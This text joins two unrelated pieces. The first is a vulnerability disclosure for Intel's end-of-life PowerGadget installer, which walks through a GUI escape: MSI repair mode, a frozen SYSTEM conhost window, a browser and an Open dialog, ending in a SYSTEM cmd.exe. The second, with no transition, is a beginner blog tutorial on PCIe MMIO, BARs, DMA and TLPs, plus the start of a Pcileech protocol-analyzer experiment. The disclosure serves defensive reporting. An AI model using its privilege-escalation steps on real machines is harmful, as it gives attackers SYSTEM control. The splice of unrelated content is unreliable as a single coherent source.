Risk score (CVSSv3): 7.8 HIGH  AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H (https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H&version=3.1)

I have reported this issue to Intel, but since the product has been marked End of Life since October 2023, it is not going to receive a security update nor a security advisory. Intel said that they are OK with me making this finding public, under the condition that I would emphasize that the product is EOL.

Description and steps to replicate:
On systems where Intel PowerGadget is installed from an MSI package, a local interactive regular user is able to run the MSI installer file in "repair" mode and hijack the conhost.exe process (which is created by an instance of sc.exe that the installer calls during the process) by quickly left-clicking on the console window that pops up for a split second in the late stage of the process. Left-clicking on the conhost.exe console window area freezes the console (meaning it prevents the sc.exe process from exiting). That process is running as NT AUTHORITY\SYSTEM. From there, it is possible to run a web browser by clicking on one of the links in the small GUI window that can be opened by right-clicking on the console window bar and selecting "Properties". Once a web browser is spawned, the attacker can call up the "Open" dialog and in that way get a fully working escape to Explorer. From there they can, for example, browse to C:\Windows\System32, right-click on cmd.exe and run it, obtaining a SYSTEM shell.

Now, an important detail: on most recent builds of Windows, neither Edge nor Internet Explorer will spawn as SYSTEM (this is a mitigation from Microsoft); thus, for successful exploitation, another browser has to already be present on the system. As you can see, I picked Chrome and then spawned an instance of cmd.exe, which turned out to be running as SYSTEM. Also, when doing this, DO NOT check "always use this app" in that dialog: if you pick the wrong browser (e.g. Edge or IE), it will be saved as the default http/https handler for SYSTEM, and from then on further attacks like this won't work if you want to repeat the POC, unless you reverse that change somewhere in the registry.

This class of Local Privilege Escalations is described by Mandiant in this article: https://www.mandiant.com/resources/blog/privileges-third-party-windows-installers.

To run the installer in repair mode, one needs to identify the proper MSI file. After a normal installation, it is by default present in the C:\Windows\Installer directory, under a random name. The proper file can be identified by attributes like checksum, size or "author" information, just as presented in the screenshot below:

The exploitation process is illustrated in the screenshots below, reflecting the steps taken to attain a SYSTEM shell (no exploit development is required; the issue can be exploited using the GUI).

Just for the record, the versions of Chrome and Windows this was successfully performed on:

Recommendation:
Technically, as per the reference, it is recommended to change the way sc.exe is called by using the WixQuietExec() method (see the second reference). In that case the conhost.exe window will not be visible to the user, making it impossible to perform any GUI interaction and escape.
I am, however, aware that this product has not been maintained since October 2023 (https://www.intel.com/content/www/us/en/developer/articles/tool/power-gadget.html), and that includes security updates. Still, I believe a security advisory and CVE should be released just to make users and administrators aware of why they need to replace PowerGadget with Intel Performance Counter Monitor.
Another possible (short-term) mitigation is to disable MSI (https://learn.microsoft.com/en-us/windows/win32/msi/disablemsi).

References:
https://www.mandiant.com/resources/blog/privileges-third-party-windows-installers
https://wixtoolset.org/docs/v3/customactions/qtexec/
https://www.intel.com/content/www/us/en/developer/articles/tool/power-gadget.html
https://learn.microsoft.com/en-us/windows/win32/msi/disablemsi

PCIe Part 2 - All About Memory: MMIO, DMA, TLPs, and more!

Recap from Part 1

In Part 1 of this post series, we discussed ECAM and how configuration space accesses looked in both software and on the hardware packet network. In that discussion, the concepts of TLPs (Transaction Layer Packets) were introduced, which is the universal packet structure by which all PCIe data is moved across the hierarchy. We also discussed how these packets move similar to Ethernet networks in that an address (the BDF in this case) was used by routing devices to send Configuration Space packets across the network.

Configuration space reads and writes are just one of several ways that I/O can be performed directly with a device. Given its "configuration" name, it is clear that it is not intended for performing large amounts of data transfer. Its major downfall is speed, as a configuration space packet can only carry at most 64 bits of data in either direction (often only 32 bits). With that tiny amount of usable data, the overhead of the packet and other link headers is significant, and bandwidth is therefore wasted.

As discussed in Part 1, understanding memory and addresses will continue to be the key to understanding PCIe. In this post, we will look more in-depth into the much faster forms of device I/O transactions and begin to form an understanding of how software device drivers actually interface with PCIe devices to do useful work. I hope you enjoy!

NOTE: You do not need to be an expert in computer architecture or TCP/IP networking to get something from this post. However, knowing the basics of TCP/IP and virtual memory is necessary to grasp some of the core concepts of this post. This post also builds off of information from Part 1. If you need to review these, do so now!

Introduction to Data Transfer Methods in PCIe

Configuration space was a simple and effective way of communicating with a device by its BDF during enumeration time. It is a simple mode of transfer for a reason - it must be the basis by which all other data transfer methods are configured and made usable. Once the device is enumerated, configuration space has set up all of the information the device needs to perform actual work together with the host machine. Configuration space is still used to allow the host machine to monitor and respond to changes in the state of the device and its link, but it will not be used to perform actual high speed transfer or functionality of the device.

What we now need are data transfer methods that let us really begin to take advantage of the high-speed transfer throughput that PCIe was designed for. Throughput is a measurement of the number of bytes transferred over a given period of time. This means that to maximize throughput, we must minimize the overhead of each packet and transfer the maximum number of bytes per packet. If we only send a few DWORDs (4 bytes each) per packet, as in the case of configuration space, the exceptional high-speed transfer capabilities of the PCIe link are lost.

Without further ado, let’s introduce the two major forms of high-speed I/O in PCIe:

  • Memory Mapped Input/Output (abbrev. MMIO) - In the same way the host CPU reads and writes memory to ECAM to perform config space access, MMIO can be used to map an address space of a device to perform memory transfers. The host machine configures “memory windows” in its physical address space that gives the CPU a window of memory addresses which magically translate into reads and writes directly to the device. The memory window is decoded inside the Root Complex to transform the reads and writes from the CPU into data TLPs that go to and from the device. Hardware optimizations allow this method to achieve a throughput that is quite a bit faster than config space accesses. However, its speed still pales in comparison to the bulk transfer speed of DMA.
  • Direct Memory Access (abbrev. DMA) - DMA is by far the most common form of data transfer due to its raw transfer speed and low latency. Whenever a driver needs to do a transfer of any significant size between the host and the device in either direction, it will assuredly be DMA. But unlike MMIO, DMA is initiated by the device itself, not the host CPU. The host CPU will tell the device over MMIO where the DMA should go, and the device itself is responsible for starting and finishing the DMA transfer. This allows devices to perform DMA transactions without the CPU’s involvement, which saves a huge number of CPU cycles compared to the device having to wait for the host CPU to tell it what to do for each transfer. Due to its ubiquity and importance, it is incredibly valuable to understand DMA from both the hardware implementation and the software interface.


High level overview of MMIO method


High level overview of performing DMA from device to RAM. The device interrupts the CPU when the transfer to RAM is complete.

Introduction to MMIO

What is a BAR?

Because configuration space memory is limited to 4096 bytes, there’s not much useful space left over for device-specific functionality. What if a device wanted to map a whole gigabyte of MMIO space for accessing its internal RAM? There’s no way to fit that into 4096 bytes of configuration space. So instead, it will need to request what is known as a BAR (Base Address Register). This is a register exposed through configuration space that allows the host machine to configure a region of its memory to map directly to the device. Software on the host machine then accesses BARs through memory read/write instructions directed at the BAR’s physical addresses, just as we’ve seen with the MMIO in ECAM in Part 1. Just as with ECAM, the act of reading or writing to this mapping of device memory will translate directly into a packet sent over the hierarchy to the device. When the device needs to respond, it will send a new packet back up through the hierarchy to the host machine.


Device drivers running on the host machine access BAR mappings, which translate into packets sent through PCIe to the device.

When a CPU instruction reads the memory of a device’s MMIO region, a Memory Read Request Transaction Layer Packet (MemRd TLP) is generated that is transferred from the Root Complex of the host machine down to the device. This type of TLP informs the receiver that the sender wishes to read a certain number of bytes from the receiver. The expectation of this packet is that the device will respond with the contents at the requested address as soon as possible.

All data transfer packets sent and received in PCIe will be in the form of these Transaction Layer Packets. Recall from Part 1 that these packets are the central abstraction by which all communication between devices takes place in PCIe. These packets are reliable in the case of data transfer errors (similar to TCP in networking) and can be retried/resent if necessary. This ensures that data transfers are protected from the harsh nature of electrical interference that takes place in the extremely high speeds that PCIe can achieve. We will look closer at the structure of a TLP soon, but for now just think of these as regular network packets you would see in TCP.


When the device responds, the CPU updates the contents of the register with the result from the device.

When the device receives the requestor packet, the device responds to the memory request with a Memory Read Response TLP. This TLP contains the result of the read from the device’s memory space given the address and size in the original requestor packet. The device marks the specific request packet and sender it is responding to into the response packet, and the switching hierarchy knows how to get the response packet back to the requestor. The requestor will then use the data inside the response packet to update the CPU’s register of the instruction that produced the original request.

While a TLP is in transit, the CPU must wait until the memory request is complete; it cannot be interrupted or perform much useful work. As you might see, if lots of these requests need to be performed, the CPU will spend a lot of time just waiting for the device to respond to each request. While there are optimizations at the hardware level that make this process more streamlined, it still is not optimal to spend CPU cycles waiting for a data transfer to complete. Hopefully you see that we need a second type of transfer, DMA, to address these shortcomings of BAR access.

Another important point here is that device memory does not strictly need to be backed by the device’s RAM. While it is common to see devices with onboard RAM exposing a mapping of that internal RAM through a BAR, this is not a requirement. It’s possible that accessing the device’s BAR might instead access internal registers of the device or cause the device to take certain actions. For example, writing to a BAR is the primary way by which devices are told to begin performing DMA. A core takeaway should be that device BARs are very flexible and can be used both for controlling the device and for performing data transfer to or from the device.

How BARs are Enumerated

Devices request memory regions from software through their configuration space. It is up to the host machine at enumeration time to determine where in physical memory each region is going to be placed. Each device has six 32-bit values in its configuration space (known as “registers”, hence the name Base Address Register) that the software will read and write when the device is enumerated. These registers describe the length and alignment requirements of each of the MMIO regions the device wishes to allocate, one per possible BAR, up to a total of six different regions. If the device wants the ability to map a BAR above the 4GB space (a 64-bit BAR), it can combine two of the 32-bit registers to form one 64-bit BAR, leaving a maximum of only three 64-bit BARs. This retains the layout of config space for legacy purposes.


A Type 0 configuration space structure, showing the 6 BARs.

TERMINOLOGY NOTE: Despite the acronym BAR meaning Base Address Register, you will see the above text refers to the memory window of MMIO as a BAR as well. This unfortunately means that the name of the register in configuration space is also the same name as the MMIO region given to the device (both are called BARs). You might need to read into the context of what is being talked about to determine if they mean the window of memory, or the actual register in config space itself.

BARs are another example of a register in config space that is not constant. In Part 1, we looked at some constant registers such as VendorID and DeviceID. But BARs are not constant registers, they are meant to be written and read by the software. In fact, the values written to the registers by the software are special in that writing certain kinds of values to the register will result in different functionality when read back. If you haven’t burned into your brain the fact that device memory is not always RAM and one can read values back different than what was written, now’s the time to do that.

Device memory can be RAM, but it is not always RAM and does not need to act like RAM!

What is DMA? Introduction and Theory

We have seen two forms of I/O so far, the config space access and the MMIO access through a BAR. The last and final form of access we will talk about is Direct Memory Access (DMA). DMA is by far the fastest method of bulk transfer for PCIe because it has the least transfer overhead. That is, the least amount of resources are required to transfer the maximum number of bytes across the link. This makes DMA absolutely vital for truly taking advantage of the high speed link that PCIe provides.

But, with great power comes great confusion. To software developers, DMA is a very foreign concept because we don’t have anything like it to compare to in software. For MMIO, we can conceptualize the memory accesses as instructions reading and writing from device memory. But DMA is very different from this, because DMA is asynchronous: it does not utilize the CPU in order to perform the transfer. Instead, as the name implies, the memory read and written comes and goes directly from system RAM. The only parties involved once DMA begins are the memory controller of the system’s main memory and the device itself. Therefore, the CPU does not spend cycles waiting for individual memory accesses. It instead just initiates the transfer and lets the platform complete the DMA on its own in the background. The platform will then inform the CPU when the transfer is complete, typically through an interrupt.

Let’s think for a second why this is so important that the DMA is performed asynchronously. Consider the case where the CPU is decrypting a huge number of files from a NVMe SSD on the machine. Once the NVMe driver on the host initiates DMA, the device is constantly streaming file data as fast as possible from the SSD’s internal storage to locations in system RAM that the CPU can access. Then, the CPU can use 100% of its processing power to perform the decryption math operations necessary to decrypt the blocks of the files as it reads data from system memory. The CPU spends no time waiting for individual memory reads to the device, it instead just hooks up the firehose of data and allows the device to transfer as fast as it possibly can, and the CPU processes it as fast as it can. Any extra data is buffered in the meantime within the system RAM until the CPU can get to it. In this way, no part of any process is waiting on something else to take place. All of it is happening simultaneously and at the fastest speed possible.

Because of its complexity and number of parts involved, I will attempt to explain DMA in the most straightforward way that I can with lots of diagrams showing the process. To make things even more confusing, every device has a different DMA interface. There is no universal software interface for performing DMA, and only the designers of the device know how that device can be told to perform DMA. Some device classes thankfully use a universally agreed upon interface such as the NVMe interface used by most SSDs or the XHCI interface for USB 3.0. Without a standard interface, only the hardware designer knows how the device performs DMA, and therefore the company or person producing the device will need to be the one writing the device driver rather than relying on the universal driver bundled with the OS to communicate with the device.

A “Simple” DMA Transaction - Step By Step


The first step of our DMA journey will be looking at the initial setup of the transfer. This involves a few steps that prepare the system memory, kernel, and device for the upcoming DMA transfer. In this case, we will be setting up DMA in order to read the contents of our DMA Buffer, which is present in system RAM, and place them into the device’s on-board RAM at Target Memory. We have already chosen at this point to read this memory from the DMA Buffer into address 0x8000 on the device. The goal is to transfer this memory as quickly as possible from system memory to the device so it can begin processing it. Assume in this case that the amount of memory is many megabytes and MMIO would be too slow, but we will only show 32 bytes of memory for simplicity. This transfer will be the simplest kind of DMA transfer: copy a block of memory of known size and address from system RAM into device RAM.

Step 1 - Allocating DMA Memory from the OS

The first step of this process is Allocate DMA Memory from OS. This means that the device driver must make an OS API call to ask the OS to allocate a region of memory for the device to write data to. This is important because the OS might need to perform special memory management operations to make the data available to the device, such as removing protections or reorganizing existing allocations to facilitate the request.

DMA memory classically must be contiguous physical memory, meaning that the device starts at some base address and reads/writes data linearly from the start to the end of the buffer. Therefore, the OS must be responsible for organizing its physical memory to create contiguous ranges that are large enough for the DMA buffers being requested by the driver. Sometimes this can be very difficult for the memory manager to do on a system that has been running for a very long time or has limited physical memory. Therefore, enhancements in this space have allowed more modern devices to transfer to non-contiguous regions of memory using features such as Scatter-Gather and IOMMU Remapping. Later on, we will look at some of those features. But for now, we will focus only on the simpler contiguous memory case.

Once the requested allocation succeeds, the API returns the memory address of the buffer in system RAM. This is the address through which the device will access the memory via DMA. Addresses returned by an API intended for DMA are given a special name: device logical address, or just logical address. For our example, a logical address is identical to a physical address. The device sees the exact same view of physical memory that our OS sees, and there are no additional translations done. However, this might not always be the case in more advanced forms of transfer. Therefore it’s best to be aware that a device address given to you might not always be the same as its actual physical address in RAM.

Once the buffer is allocated, since the intention is to move data from this buffer to the device, the device driver will populate the buffer in advance with the information it needs to write to the device. In this example, data made of a repeating 01 02 03 04 pattern is being transferred to the device’s RAM.

Step 2 - Programming DMA addresses to the device and beginning transfer

The next step of the transfer is to prepare the device with the information it needs to perform the transaction. This is usually where the knowledge of the device’s specific DMA interface is most important. Each device is programmed in its own way, and the only way to know how the driver should program the device is to either refer to its general standard such as the NVMe Specification or to simply work with the hardware designer.

In this example, I am going to make up a simplified DMA interface for a device with only the most barebones features necessary to perform a transfer. In the figures below, we can see that this device is programmed through values written into its BAR0 MMIO region. That means that to program DMA for this device, the driver must write memory into the MMIO region specified by BAR0. The location of each register inside this BAR0 region is known in advance by the driver writer and is integrated into the device driver’s code.

I have created four device registers in BAR0 for this example:

  • Destination Address - The address in the device’s internal RAM to write the data it reads from system RAM. This is where we will program our already-decided destination address of 0x8000.
  • Source Address - The logical address of system RAM that the device will read data from. This will be programmed with the logical address of the DMA buffer that we want the device to read.
  • Transfer Size - The size in bytes that we want to transfer.
  • Initiate Transfer - As soon as a 1 is written to this register, the device will begin DMAing between the addresses given above. This is how the driver tells the device that the buffer is populated and the transfer is ready to start. This is commonly known as a doorbell register.

image-20240317134403332

In the above diagram, the driver will need to write the necessary values into the registers using the mapped memory of BAR0 for the device (how it mapped this memory is dependent on the OS). The values in this diagram are as follows:

  • Target Memory - The memory we want to copy into on the device is at 0x00008000, which maps to a region of memory in the device’s on-board RAM. This will be our destination address.

  • DMA Buffer - The OS allocated the chunk of memory at 0x001FF000, so this will be our source address.

With this information, the driver can now program the values into the device as shown here:

image-20240326182317434

At this point, the driver has configured all the registers necessary to perform the transfer. The last step is to write a value to the Initiate Transfer register, which acts as the doorbell register that begins the transfer. As soon as this value is written, the device will drive the DMA transfer and execute it independently of the driver or the CPU’s involvement. The driver has completed its job of starting the transfer, and the CPU is free to do other work while it waits on the device to notify the system of the DMA completion.

Step 3 - Device performs DMA transaction

Now that the doorbell register has been written by the driver, the device takes over to handle the actual transfer. On the device itself, there exists a module called the DMA Engine responsible for handling and maintaining all aspects of the transaction. When the device was programmed, the register writes to BAR0 were programming the DMA engine with the information it needs to begin sending off the necessary TLPs on the PCIe link to perform memory transactions.

As discussed in a previous section, all memory operations on the PCIe link are done through Memory Write/Read TLPs. Here we will dive into what TLPs are sent and received by the DMA engine of the device while the transaction is taking place. Remember that it is easier to think of TLPs as network packets that are sending and receiving data on a single, reliable connection.

Interlude: Quick look into TLPs

Before we look at the TLPs on the link, let’s take a closer look at a high level overview of packet structure itself.

image-20240326180710226

Here are two TLPs shown for a memory read request and response. As discussed, TLPs for memory operations utilize a request and response system. The device performing the read will generate a Read Request TLP for a specific address and length (in 4-byte DWORDs), then sit back and wait for the completion packets to arrive on the link containing the response data.

We can see there is metadata related to the device producing the request, the Requester, as well as a unique Tag value. This Tag value is used to match a request with its completion. When the device produces the request, it tags the TLP with a unique value to track a pending request. The value is chosen by the sender of the request, and it is up to the sender to keep track of the Tags it assigns.

As completions arrive on the link, the Tag value of the completion allows the device to properly move the incoming data to the desired location for that specific transfer. This system allows there to be multiple unique outstanding transfers from a single device that are receiving packets interleaved with each other but still remain organized as independent transfers.

Also inside the packet is the information necessary to enable the PCIe switching hierarchy to determine where the request and completions need to go. For example, the Memory Address is used to determine which device is being requested for access. Each device in the hierarchy has been programmed during enumeration time to have unique ranges of addresses that each device owns. The switching hierarchy looks at the memory address in the packet to determine where that packet needs to go in order to access that address.

Once the device receives and processes the request, the response data is sent back in the form of a Completion TLP. The completion, or “response” packet, can and often will be fragmented into many smaller TLPs that each send a part of the overall response. This is because there is a Maximum Payload Size (MPS) that was determined during enumeration time to be the maximum the device and bus could handle. The MPS is configurable based on platform and device capability and is a power-of-2 size starting from 128 bytes and going up to a potential 4096. Typically this value is around 256 bytes, meaning large read requests will need to be split into many smaller TLPs. Each of these packets has a field that dictates what offset of the original request the completion is responding to, and its payload is the chunk of data being returned.

There is a common misconception that memory TLPs use BDF to address where packets need to go. The request uses only a memory address to direct a packet to its destination, and it is the responsibility of the bridges in between the device and destination to get that packet to its proper location. However, the completion packets do use the BDF of the Requester to return the data back to the device that requested it.

Below is a diagram of a memory read and response showcasing that requests use an address to make requests and completions use the BDF in the Requester field of the request to send a response:

image-20240326183419841 image-20240326183429287

Now back to the actual transaction…

Let’s look at everything that is sent and received by the DMA Engine in order to perform our request. Since we requested 32 bytes of data, there will only be a single Memory Read Request and a single Memory Read Completion packet with the response. As a small exercise for your understanding, stop reading for a moment and think about which device is going to send and receive which TLP in this transaction. Scroll up to the diagrams of Step 2 if you need to.

Now, let’s dig into the actual packets of the transfer. While I will continue to diagram this mock example out, I thought that for this exercise it might be fun and interesting for the reader to actually see what some of these TLPs look like when a real transaction is performed.

In the experiment, I set up the same general parameters as seen above with a real device and initiated DMA. The device sends real TLPs to read memory from system RAM into the device. Therefore, you will get a rare look at an example of the actual TLPs sent when performing this kind of DMA, which are otherwise impossible to see in transit without one of these analyzers.

To view this experiment, follow this link to the companion post: Experiment - Packet Dumping PCIe DMA TLPs with a Protocol Analyzer and Pcileech

Here is a block diagram of the memory read request being generated by the device and how the request traverses through the hierarchy.

image-20240326182111190

ERRATA: 0x32 should be 32

The steps outlined in this diagram are as follows:

  • DMA Engine Creates TLP - The DMA engine recognizes that it must read 32 bytes from 0x001FF000. It generates a TLP that contains this request and sends it out via its local PCIe link.
  • TLP Traverses Hierarchy - The switching hierarchy of PCIe moves this request through bridge devices until it arrives at its destination, which is the Root Complex. Recall that the RC is responsible for handling all incoming packets destined for accessing system RAM.
  • DRAM Controller is Notified - The Root Complex internally communicates with the DRAM controller which is responsible for actually accessing the memory of the system DRAM.
  • Memory is Read from DRAM - The given length of 32 bytes is requested from DRAM at address 0x001FF000 and returned to the Root Complex with the values 01 02 03 04…

Try your best not to be overwhelmed by this information; I do understand there’s a lot going on just for the single memory request TLP. At a high level, all of this boils down to just reading 32 bytes of memory from address 0x001FF000 in RAM. How the platform actually performs that system DRAM read by communicating with the DRAM controller is shown just for your interest. The device itself is unaware of how the Root Complex actually reads this memory; it just initiates the transfer with the TLP.

NOTE: Not shown here is the even more complicated process of RAM caching. On x86-64, all memory accesses from devices are cache coherent, which means that the platform automatically synchronizes the CPU caches with the values being accessed by the device. On other platforms, such as ARM platforms, this is an even more involved process due to its cache architecture. For now, we will just assume that the cache coherency is being handled automatically for us and we don’t have any special worries regarding it.

When the Root Complex received this TLP, it marked internally what the Requester and Tag were for the read. While it waits for DRAM to respond with the data, knowledge of this request is pended in the Root Complex. To conceptualize this, think of it as an “open connection” on a network socket: the Root Complex knows what it needs to respond to, and therefore will wait until the response data is available before sending data back “over the socket”.

Finally, the Completion is sent back from the Root Complex to the device. Note the Destination is the same as the Requester:

image-20240317144026603

Here are the steps outlined with the response packet as seen above:

  • Memory is read from DRAM - 32 bytes are read from the address of the DMA Buffer at 0x001FF000 in system DRAM by the DRAM controller.
  • DRAM Controller Responds to Root Complex - The DRAM controller internally responds to the Root Complex with the memory requested from DRAM.
  • Root Complex Generates Completion - The Root Complex tracks the transfer and creates a Completion TLP for the values read from DRAM. In this TLP, the metadata values are set based on the knowledge that the RC has of the pending transfer, such as the number of bytes being sent, the Tag for the transfer, and the destination BDF that was copied from the Requester field in the original request.
  • DMA Engine receives TLP - The DMA engine receives the TLP over the PCIe link and sees that the Tag matches the same tag of the original request. It also internally tracks this value and knows that the memory in the payload should be written to Target Memory, which is at 0x8000 in the device’s internal RAM.
  • Target Memory is Written - The values in the device’s memory are updated with the values that were copied out of the Payload of the packet.
  • System is Interrupted - While this is optional, most DMA engines will be configured to interrupt the host CPU whenever the DMA is complete. This gives the device driver a notification when the DMA has been successfully completed by the device.

Again, this is a lot of steps involved in handling just this single completion packet. However, you can again think of this whole thing as simply “a response of 32 bytes is received for the device’s request.” The rest of these steps just show what the full end-to-end response processing looks like.

From here, the device driver is notified that the DMA is complete and the device driver’s code is responsible for cleaning up the DMA buffers or storing them away for use next time.

After all of this work, we have finally completed a single DMA transaction! And to think that this was the “simplest” form of a transfer I could provide. With the addition of IOMMU Remapping and Scatter-Gather Capability, these transactions can get even more complex. But for now, you should have a solid understanding of what DMA is all about and how it actually functions with a real device.

Outro - A Small Note on Complexity

If you finished reading this post and felt that you didn’t fully grasp all of the concepts thrown at you, or feel overwhelmed by the complexity, you should not worry. The reason these posts are so complex is that they not only span a wide range of topics, but a wide range of professions as well. Typically, each part of this overall system has distinct teams in the industry who focus only on their “cog” in this complex machine. Often hardware developers focus on the device, driver developers focus on the driver code, and OS developers focus on the resource management. There’s rarely much overlap between these teams, except when handing off at their boundary so another team can link up to it.

These posts are a bit unique in that they try to document the system as a whole for conceptual understanding, not implementation. This means that where team boundaries are usually drawn, these posts simply do not care. I encourage readers who find this topic interesting to continue to dig into it on their own time. Maybe you can learn a thing about FPGAs and start making your own devices, or maybe you can acquire a device and start trying to reverse engineer how it works and communicate with it over your own custom software.

An insatiable appetite for opening black boxes is what the “hacker” mindset is all about!

Conclusion

I hope you enjoyed this deep dive into memory transfer on PCIe! While I have covered a ton of information in this post, the rabbit hole always goes deeper. Thankfully, by learning about config space access, MMIO (BARs), and DMA, you have now covered every form of data communication available in PCIe! For every device connected to the PCIe bus, the communication between the host system and device will take place with one of these three methods. All of the setup and configuration of a device’s link, resources, and driver software is to eventually facilitate these three forms of communication.

A huge reason this post took so long to get out there was due to just the sheer amount of information that I would have to present to a reader in order to make sense of all of this. It’s hard to decide what is worth writing about and what is so much depth that the understanding gets muddied. That decision paralysis has made the blog writing process take much longer than I intended. That, combined with a full time job, makes it difficult to find the time to get these posts written.

In the upcoming posts, I am looking forward to discussing some or all of the following topics:

  • PCIe switching/bridging and enumeration of the hierarchy
  • More advanced DMA topics, such as DMA Remapping
  • Power management; how devices “sleep” and “wake”
  • Interrupts and their allocation and handling by the platform/OS
  • Simple driver development examples for a device

As always, if you have any questions or wish to comment or discuss an aspect of this series, you can best find me by “@gbps” in the #hardware channel on my discord, the Reverse Engineering discord: https://discord.com/invite/rtfm

Please look forward to future posts!

-Gbps

Experiment - Packet Dumping PCIe DMA TLPs with a Protocol Analyzer and Pcileech

Introduction

In this post, I will be going over a small experiment where we hook up a PCIe device capable of performing arbitrary DMA to a Keysight PCIe 3.0 Protocol Analyzer to intercept and observe the Transaction Layer Packets (TLPs) that travel over the link. The purpose of this experiment is to develop a solid understanding of how memory transfer takes place under PCIe.

This post is part of a series on PCIe for beginners. I encourage you to read the other posts before this one!

Background: On Why PCIe Hardware is so Unapproachable

There are a couple of recurring themes in working with PCIe that make it exceptionally difficult for beginners: access to information and cost. Unlike many technologies we use today in computing, PCIe is mostly an “industry only” club. Generally, if you have not worked directly with it in the industry, it is unlikely that you will have access to the information and tools necessary to work with it. This is not so much an intentional gatekeeping effort as it is that the field serves a niche group of hardware designers, and the tools needed to work with it are generally prohibitively expensive for a single individual.

The links operate near the fastest cutting-edge data transfer speeds available in the time period in which each standard is put into practice. The most recent standard, PCIe 6.2, has proof-of-concept hardware that operates at a whopping 64 GigaTransfers/s (GT/s) per lane. Each transfer moves one bit, which means a full 16-lane link is operating at a little over 1 Terabit of information transfer per second in total. Considering that most of our TCP/IP networks still operate at 1 Gigabit max and the latest cutting-edge USB4 standard operates at 40 Gigabit max, that is still an order of magnitude faster than the transfer speeds we encounter in our day-to-day.

To build electronic test equipment, say an oscilloscope, that is capable of analyzing the electrical connection of a 64 GT/s serial link is an exceptional feat in 2024. These devices need to contain the absolute most cutting-edge components, DACs, and FPGAs/ASICs being produced on the market to even begin to observe the speed at which the data travels over a copper trace without affecting the signal. Cutting edge dictates a price, and that price easily hits many hundreds of thousands of USD. Unless you’re absolutely flush with cash, you will only ever see one of these in a hardware test lab at a select few companies working with PCIe links.

PCIe 6.0 transmitter compliance test solution

Shown: An incredibly expensive PCIe 6.0 capable oscilloscope. Image © Keysight Technologies

But, all is not lost. Due to a fairly healthy secondhand market for electronics test equipment and recycling, it is still possible for an individual to acquire a PCIe protocol interceptor and analyzer for orders of magnitude less than what they were sold for new. The tricky part is finding all of the different parts of the collective set that are needed. An analyzer device is not useful without a probe to intercept traffic, nor is it useful without the interface used to hook it up to your PC or the license to the software that runs it. All of these pieces unfortunately have to align to recreate a functioning device.

It should be noted that these protocol analyzers are special in that they can see everything happening on the link. They have the capability to analyze each of the three layers of the PCIe link stack: the Physical, Data Link, and Transaction layers. If you’re not specifically designing something within the Physical or Data Link layer, captures of those layers are not nearly as important as the Transaction layer. It is impossible for a PC platform to “dump” PCIe traffic like network or USB traffic; the cost of adding such functionality would well outweigh the benefit.

My New PCIe 3.0 Protocol Analyzer Setup

After a year or so of looking, I was finally lucky enough to find all of the necessary pieces for a PCIe 3.0 Protocol Analyzer on Ebay at the same time, so I took the risk and purchased each of these components for myself (for what I believe was a fantastic deal compared to even the used market). I believe I was able to find these devices listed at all because they were approaching about a decade old and, at max, support PCIe 3.0. As newer consumer devices on the market are quickly moving to 4.0 and above, I can guess that this analyzer was probably from a lab that has recently upgraded to a newer spec. This however does not diminish the usefulness of a 3.0 analyzer, as all devices of a higher spec are backwards compatible with older speeds, and a huge swath of devices on the market in 2024 are still PCIe 3.0. NVMe SSDs and consumer GFX cards have been moving to 4.0 for the enhanced speed, but they still use the same feature set as 3.0. Most newer features are reserved for the server space.

Finding historical pricing information for these devices and cards is nearly impossible. You pretty much just pay whatever the company listing the device wants to get rid of it for. It’s rare to find any basis for what these are really “worth”.

Here is a listing of my setup, with the exact component identifiers and listings that were necessary to work together. If you were to purchase one of these, I do recommend this setup. Note that cables and cards similar but not exactly the same identifiers might not be compatible, so be exact!

  • Agilent/Keysight U4301A PCI Express Protocol Analyzer Module - $1,800 USD (bundled with below)
    • This is the actual analyzer module from Agilent that supports PCIe 3.0. This device is similar to a 1U server that must rack into a U4002A Digital Tester Chassis or a M9502A Chassis.
    • The module comes installed with its software license on board. You do not need to purchase a separate license for its functionality.
    • I used the latest edition of Windows 11 for the software.
    • This single module can support up to 8 lanes of upstream and downstream at the same time. Two modules in a chassis would be required for 16 lanes of upstream and downstream.
    • https://www.keysight.com/us/en/product/U4301A/pcie-analyzer.html
  • Agilent/Keysight U4002A Digital Tester Chassis - $1,800 USD (bundled with above)
    • This is the chassis that the analyzer module racks into. The chassis has an embedded controller module on it at the bottom which will be the component that hooks up to the PC. This is in charge of controlling the U4301A module and collects and manages its data for sending back to the PC.
  • One Stop Systems OSS Host PCIe Card 7030-30048-01 A - $8 USD
    • The host card that slots into a PCIe slot on the host PC’s motherboard. The cord and card should be plugged in and the module powered on for at least 4 minutes prior to booting the host PC.
  • Molex 74546-0403 PCIe x4 iPass Cable - $15.88 USD
    • The cord that connects the embedded controller module in the chassis to the PC through the OSS Host PCIe card.
  • Agilent/Keysight U4321-66408 PCIe Interposer Probe Card With Cables And Adapter - $1,850 USD
    • This is the interposer card that sits between the device under test and the slot on the target machine. This card is powered by a 12V DC power brick.
    • This is an x8 card, so it can at max support 8 lanes of PCIe. Devices under test will negotiate down to 8 lanes if needed, so this is not an issue.
    • https://www.keysight.com/us/en/product/U4321A/pcie-interposer-probe.html
  • At least 2x U4321-61601 Solid Slot Interposer Cables are needed to attach to the U4321. 4x are needed for bidirectional x8 connection. These were bundled along with the above.

  • Total Damage: Roughly ~$4000 USD.

image-20240326142902108

Shown: My U4301A Analyzer hooked up to my host machine

FPGA Setup for DMA with Pcileech

It’s totally possible to connect an arbitrary PCIe device, such as a graphics card, and capture its DMA for this experiment. However, I think it’s much nicer to create the experiment by being able to issue arbitrary DMA from a device and observing its communication under the analyzer. That way there’s not a lot of chatter from the regular device’s operation happening on the link that affects the results.

For this experiment, I’m using the fantastic Pcileech project. This project uses a range of possible Xilinx FPGA boards to perform arbitrary DMA operations with a target machine through the card. The card hooks up to a sideband host machine that issues commands; TLPs are sent and received over a connection (typically USB, sometimes UDP) between that host and the FPGA board, and eventually get sent/received on the actual PCIe link. Basically, this project creates a “tunnel” from the PCIe TLP link to the host machine in order to perform DMA with a target machine.

If you are not aware, FPGA stands for Field-Programmable Gate Array. It is essentially a chip that can have all of its digital logic elements reprogrammed at runtime. This allows a hardware designer to create and change high speed hardware designs on the fly without having to actually create a custom silicon chip, which can easily run in the millions of USD. The development boards for these FPGAs start at about $200 for entry level boards and typically have lots of high and low speed I/O interfaces that the chip could be programmed to communicate to. Many of these FPGA boards support PCIe, so this is a great way to work with high speed protocols that cannot be handled by your standard microcontroller.

Artix-7 FPGA

